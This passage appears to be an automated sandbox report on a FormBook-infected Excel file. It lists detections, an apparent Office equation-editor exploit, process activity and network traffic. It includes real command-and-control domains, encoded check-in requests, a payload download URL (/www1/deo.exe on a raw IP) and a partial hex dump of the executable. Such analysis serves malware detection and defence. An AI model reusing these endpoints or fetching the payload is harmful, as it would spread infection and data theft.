"geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: OCT 13 2021 - PRINT COPY.xlsx

ReversingLabs: Detection: 23%

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://18.197.254.181/www1/deo.exe	Avira URL Cloud: Label: malware
Source: www.fis.photos/ef6c/	Avira URL Cloud: Label: malware
Source: http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV	Avira URL Cloud: Label: malware
Source: http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV	Avira URL Cloud: Label: phishing

Source: 5.2.vbc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.539428502.00000000004AC000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, cmd.exe
Source:	Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb,$uJ6$uJ@$uJ source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe, 00000007.00000000.540165675.000000004A730000.00000040.00020000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	7_2_4A732E73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A736E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	7_2_4A736E47
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A750202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,	7_2_4A750202
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A74BF0C FindFirstFileW,FindNextFileW,FindClose,	7_2_4A74BF0C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,	7_2_4A73BBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A750492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,	7_2_4A750492

Source: global traffic

DNS query: name: www.ahljsm.com

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx	5_2_00406ABB
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	5_2_0040C37C
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	5_2_0040C3E9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop ebx	7_2_00086ABB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	7_2_0008C37C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	7_2_0008C3E9

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.197.254.181:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.197.254.181:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 108.170.14.102 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dbe648.com
Source: C:\Windows\explorer.exe	Domain query: www.lacucinadesign.com
Source: C:\Windows\explorer.exe	Network Connect: 45.39.212.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.upinmyfeels.com
Source: C:\Windows\explorer.exe	Domain query: www.publicationsplace.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ahljsm.com

Performs DNS queries to domains with low reputation

Show sources

Source:

DNS query: www.restaurant-utopia.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.fis.photos/ef6c/

Source: Joe Sandbox View

ASN Name: SSASN2US SSASN2US

Source: global traffic	HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1Host: www.ahljsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.publicationsplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.upinmyfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1Host: www.lacucinadesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.restaurant-utopia.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 18:15:52 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Oct 2021 09:32:48 GMTETag: "73c00-5ce38a52a9832"Accept-Ranges: bytesContent-Length: 474112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 a5 66 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 05 00 00 90 01 00 00 00 00 00 9e c9 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c9 05 00 4f 00 00 00 00 e0 05 00 94 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 a9 05 00 00 20 00 00 00 aa 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 94 8c 01 00 00 e0 05 00 00 8e 01 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 3a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c9 05 00 00 00 00 00 48 00 00 00 02 00 05 00 4c 62 00 00 70 4f 00 00 03 00 00 00 59 00 00 06 bc b1 00 00 90 17 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 56 00 00 00 00 00 00 00 02 1e 7d 01 00 00 04 02 1f 2a 1f 2a 73 15 00 00 0a 7d 02 00 00 04 02 16 7d 03 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 09 00 00 06 00 02 7b 07 00 00 04 72 01 00 00 70 6f 17 00 00 0a 00 02 7b 09 00 00 04 72 05 00 00 70 6f 17 00 00 0a 00 2a 00 00 1b 30 06 00 fd 01 00 00 01 00 00 11 00 02 03 28 18 00 00 0a 26 02 7b 03 00 00 04 16 fe 01 0d 09 2c 08 14 13 04 38 dc 01 00 00 73 41 00 00 06 25 02 7b 01 00 00 04 02 7c 02 00 00 04 28 19 00 00 0a 5a 02 7b 01 00 00 04 02 7c 02 00 00 04 28 1a 00 00 0a 5a 20 0a 20 26 00 73 1b 00 00 0a 7d 20 00 00 04 25 17 7d 1e 00 00 04 0a 06 7b 20 00 00 04 28 1c 00 00 0a 13 05 00 11 05 28 1d 00 00 0a 6f 1e 00 00 0a 00 16 13 06 2b 63 16 13 07 2b 43 00 11 07 11 06 58 18 5d 16 fe 01 13 08 11 08 2c 2b 11 05 28 1f 00 00 0a 11 07 02 7b 01 00 00 04 5a 11 06 02 7b 01 00 00 04 5a 02 7b 01 00 00 04 02 7b 01 00

Source: global traffic

HTTP traffic detected: GET /www1/deo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.197.254.181Connection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 18:17:12 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 66 36 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ef6c/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:17:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "61672139-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:17:30 GMTContent-Type: text/htmlContent-Length: 275ETag: "61672139-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181
Source: unknown	TCP traffic detected without corresponding DNS query: 18.197.254.181

Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.505593565.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684965488.0000000001D50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.492983646.00000000083C8000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29DF0F06.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.ahljsm.com

Source: global traffic	HTTP traffic detected: GET /www1/deo.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.197.254.181Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1Host: www.ahljsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.publicationsplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.upinmyfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1Host: www.lacucinadesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.restaurant-utopia.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
